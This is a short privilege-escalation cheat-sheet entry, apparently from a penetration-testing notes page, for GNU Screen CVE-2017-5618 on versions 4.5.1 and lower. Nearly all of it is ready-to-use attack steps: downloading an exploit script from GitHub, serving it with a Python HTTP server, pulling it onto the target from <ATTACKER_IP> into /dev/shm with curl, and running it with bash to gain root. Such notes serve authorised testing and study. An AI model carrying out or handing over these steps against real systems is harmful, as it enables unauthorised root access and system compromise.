PRIMARY CATEGORY → LINUX PRIVESC

GNU Screen

CVE-2017-5618

Reference

Exploit

Affected Versions

4.5.1 and lower ( 4.05.00 == 4.5.0 )

From the Target 🎯

screen -v
Setup
  • Downloading the Script

From the Attacker ⚔️

curl --silent --location --request GET 'https://github.com/YasserREED/screen-v4.5.0-priv-escalate/raw/refs/heads/main/full-exploit.sh' --output exploit.bash
  • Transferring the file to the Target

From the Attacker ⚔️

python -m http.server 80

From the Target🎯

cd /dev/shm && curl --silent --location --request GET 'http://<ATTACKER_IP>/exploit.bash' --remote-name
Usage
bash exploit.bash